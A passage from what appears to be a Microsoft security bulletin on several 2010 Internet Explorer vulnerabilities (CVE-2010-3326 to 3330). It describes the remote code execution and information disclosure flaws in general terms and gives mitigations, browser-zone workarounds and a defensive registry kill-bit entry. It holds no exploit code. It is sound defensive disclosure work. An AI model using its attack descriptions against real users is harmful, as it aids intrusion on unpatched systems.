Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nAnchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nAn information disclosure vulnerability exists in the way that Internet Explorer improperly handles the Anchor element. This behavior occurs during user operation when the Anchor element is not removed during content pasting and editing, potentially revealing personally identifiable information intended for deletion.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3327.\r\n\t\r\nMitigating Factors for Anchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nMicrosoft has not identified any mitigating factors for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Anchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Anchor Element Information Disclosure Vulnerability - CVE-2010-3327\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. Potentially deleted information will remain in HTML content.\r\n\r\nWhat causes the vulnerability? \r\nDuring specific user operation, the Anchor element is not removed from the editable HTML element.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis issue is not an exploitable vulnerability. Instead, it potentially exposes previously deleted content during user operation.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and utilizing the browser for HTML content creation. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles the Anchor element.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3328.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which disables script and ActiveX controls, removing the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3328\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted when a document in an HTML format is opened in Microsoft Word. An attacker could exploit the vulnerability by convincing the user to open a malicious Word document. When a user closes the document, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3329.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nPrevent COM objects from running in Internet Explorer\r\n\r\nYou can disable attempts to instantiate a HtmlDlgHelper Class COM object in Internet Explorer by setting the kill bit for the control in the registry.\r\n\r\nWarning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.\r\n\r\nFor detailed steps that you can use to prevent a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow the steps in this article to create a Compatibility Flags value in the registry to prevent a COM object from being instantiated in Internet Explorer.\r\n\r\nTo set the kill bit for a CLSID with a value of {3050f4e1-98b5-11cf-bb82-00aa00bdce0b}, paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.\r\n\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]\r\n"Compatibility Flags"=dword:00000400\r\n\r\nYou can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy. For more information about Group Policy, visit the following Microsoft Web sites:\r\n\u2022\t\r\n\r\nGroup Policy collection\r\n\u2022\t\r\n\r\nWhat is Group Policy Object Editor?\r\n\u2022\t\r\n\r\nCore Group Policy tools and settings\r\n\r\nNote You must restart Internet Explorer for your changes to take effect.\r\n\r\nImpact of Workaround. There is no impact as long as the object is not intended to be used in Internet Explorer.\r\n\r\nHow to undo the workaround. Delete the registry keys previously added in implementing this workaround.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3329\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted when Microsoft Word has been closed, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker can send a user a specially crafted Word document that is designed to exploit this vulnerability through Microsoft Word and convince the user to view the Word document. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail. This issue cannot be exploited directly through Internet Explorer.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and open a malicious Word document for any malicious action to occur. Therefore, any systems where Microsoft Word is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nCross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nAn information disclosure vulnerability exists in Internet Explorer that could allow script to gain access to information in another domain or Internet Explorer zone. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could allow information disclosure if a user viewed the Web page. An attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3330.\r\n\t\r\nMitigating Factors for Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to 